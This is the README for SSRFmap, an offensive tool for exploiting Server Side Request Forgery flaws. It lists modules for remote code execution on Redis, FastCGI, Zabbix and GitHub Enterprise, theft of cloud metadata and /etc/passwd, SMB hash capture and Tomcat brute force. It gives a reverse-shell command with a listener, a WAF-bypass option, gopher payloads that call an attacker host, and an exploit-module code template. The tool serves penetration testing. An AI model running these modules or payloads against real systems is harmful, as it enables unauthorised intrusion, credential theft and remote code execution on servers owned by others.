# SSRFmap [![Python 3.4+](https://img.shields.io/badge/python-3.4+-blue.svg)](https://www.python.org/downloads/release/python-360/) [![Rawsec's CyberSecurity Inventory](https://inventory.raw.pm/img/badges/Rawsec-inventoried-FF5050_flat.svg)](https://inventory.raw.pm/)
SSRF vulnerabilities are often used to reach and act on other services; this framework aims to find and exploit those services easily. SSRFmap takes a Burp request file as input and a parameter to fuzz.
> Server Side Request Forgery or SSRF is a vulnerability in which an attacker forces a server to perform requests on their behalf.
## Summary
* [Modules](#modules)
* [Install and Manual](#install-and-manual)
* [Examples](#examples)
* [SSRFmap - Tests](#ssrfmap-tests)
* [Contribute](#contribute)
* [Contributors](#thanks-to-the-contributors)
## Modules
The following modules are already implemented and can be used with the `-m` argument.
| Name | Description |
| :------------- | :------------- |
| `fastcgi` | FastCGI RCE |
| `redis` | Redis RCE |
| `github` | Github Enterprise RCE < 2.8.7 |
| `zabbix` | Zabbix RCE |
| `mysql` | MySQL Command execution |
| `docker` | Docker Infoleaks via API |
| `smtp` | SMTP send mail |
| `portscan` | Scan top 8000 ports for the host |
| `networkscan` | HTTP Ping sweep over the network |
| `readfiles` | Read files such as `/etc/passwd` |
| `alibaba` | Read files from the provider (e.g: meta-data, user-data) |
| `aws` | Read files from the provider (e.g: meta-data, user-data) |
| `gce` | Read files from the provider (e.g: meta-data, user-data) |
| `digitalocean` | Read files from the provider (e.g: meta-data, user-data) |
| `socksproxy` | SOCKS4 Proxy |
| `smbhash` | Force an SMB authentication via a UNC Path |
| `tomcat` | Bruteforce attack against Tomcat Manager |
| `custom` | Send custom data to a listening service, e.g: netcat |
| `memcache` | Store data inside the memcache instance |
## Install and Manual
Basic install from the Github repository.
```powershell
$ git clone https://github.com/swisskyrepo/SSRFmap
$ cd SSRFmap/
$ pip3 install -r requirements.txt
$ python3 ssrfmap.py
usage: ssrfmap.py [-h] [-r REQFILE] [-p PARAM] [-m MODULES] [-l HANDLER]
                  [-v [VERBOSE]] [--lhost LHOST] [--lport LPORT]
                  [--uagent USERAGENT] [--ssl [SSL]] [--level [LEVEL]]

optional arguments:
  -h, --help          show this help message and exit
  -r REQFILE          SSRF Request file
  -p PARAM            SSRF Parameter to target
  -m MODULES          SSRF Modules to enable
  -l HANDLER          Start an handler for a reverse shell
  -v [VERBOSE]        Enable verbosity
  --lhost LHOST       LHOST reverse shell
  --lport LPORT       LPORT reverse shell
  --uagent USERAGENT  User Agent to use
  --ssl [SSL]         Use HTTPS without verification
  --proxy PROXY       Use HTTP(s) proxy (ex: http://localhost:8080)
  --level [LEVEL]     Level of test to perform (1-5, default: 1)
```
## Examples
First you need a request with a parameter to fuzz; Burp requests work well with SSRFmap.
They should look like the following. More examples are available in the **/data** folder.
```powershell
POST /ssrf HTTP/1.1
Host: 127.0.0.1:5000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://mysimple.ssrf/
Content-Type: application/x-www-form-urlencoded
Content-Length: 31
Connection: close
Upgrade-Insecure-Requests: 1

url=https%3A%2F%2Fwww.google.fr
```
Use `-m` followed by the module name (separate several modules with a `,`).
```powershell
# Launch a portscan on localhost and read default files
python ssrfmap.py -r data/request.txt -p url -m readfiles,portscan
```
If you need a custom user-agent, use `--uagent`. Some targets use HTTPS; you can enable it with `--ssl`.
```powershell
# Launch a portscan against an HTTPS endpoint using a custom user-agent
python ssrfmap.py -r data/request.txt -p url -m portscan --ssl --uagent "SSRFmapAgent"
```
Some modules allow you to create a connect-back; you have to specify LHOST and LPORT. SSRFmap can also listen for the incoming reverse shell.
```powershell
# Triggering a reverse shell on a Redis
python ssrfmap.py -r data/request.txt -p url -m redis --lhost=127.0.0.1 --lport=4242 -l 4242
# -l create a listener for reverse shell on the specified port
# --lhost and --lport work like in Metasploit, these values are used to create a reverse shell payload
```
When the target is protected by a WAF or some filters, you can try a wide range of payloads and encodings with the `--level` parameter.
```powershell
# --level : ability to tweak payloads in order to bypass some IDS/WAF. e.g: 127.0.0.1 -> [::] -> 0000: -> ...
```
## SSRFmap Tests
A quick way to test the framework is to run it against the `data/example.py` SSRF service.
```powershell
FLASK_APP=data/example.py flask run &
python ssrfmap.py -r data/request.txt -p url -m readfiles
```
## Contribute
I :heart: pull requests :)
Feel free to add any feature listed below or a new service.
- Redis PHP Exploitation
- HTTP module (Jenkins ?)
```powershell
gopher://<proxyserver>:8080/_GET http://<attacker:80>/x HTTP/1.1%0A%0A
gopher://<proxyserver>:8080/_POST%20http://<attacker>:80/x%20HTTP/1.1%0ACookie:%20eatme%0A%0AI+am+a+post+body
```
The following code is a template if you wish to add a module interacting with a service.
```python
from core.utils import *
import logging

name          = "servicename in lowercase"
description   = "ServiceName RCE - What does it do"
author        = "Name or pseudo of the author"
documentation = ["http://link_to_a_research", "http://another_link"]

class exploit():
    SERVER_HOST = "127.0.0.1"
    SERVER_PORT = "4242"

    def __init__(self, requester, args):
        logging.info("Module '{}' launched !".format(name))

        # Handle args for reverse shell
        if args.lhost is None: self.SERVER_HOST = input("Server Host:")
        else:                  self.SERVER_HOST = args.lhost

        if args.lport is None: self.SERVER_PORT = input("Server Port:")
        else:                  self.SERVER_PORT = args.lport

        # Data for the service
        # Using a generator to create the host list
        # Edit the following ip if you need to target something else
        gen_host = gen_ip_list("127.0.0.1", args.level)
        for ip in gen_host:
            port = "6379"
            data = "*1%0d%0a$8%0d%0aflus[...]%0aquit%0d%0a"
            payload = wrapper_gopher(data, ip, port)

            # Handle args for reverse shell
            payload = payload.replace("SERVER_HOST", self.SERVER_HOST)
            payload = payload.replace("SERVER_PORT", self.SERVER_PORT)

            # Send the payload
            r = requester.do_request(args.param, payload)
```
You can also contribute with a beer IRL or via Github Sponsor button.
### Thanks to the contributors
- [ttffdd](https://github.com/ttffdd)
## Inspired by
- [How I Chained 4 vulnerabilities on GitHub Enterprise, From SSRF Execution Chain to RCE! - Orange Tsai](https://blog.orange.tw/2017/07/how-i-chained-4-vulnerabilities-on.html)
- [Blog on Gopherus Tool -SpyD3r](https://spyclub.tech/2018/08/14/2018-08-14-blog-on-gopherus/)
- [Gopherus - Github](https://github.com/tarunkant/Gopherus)
- [SSRF testing - cujanovic](https://github.com/cujanovic/SSRF-Testing)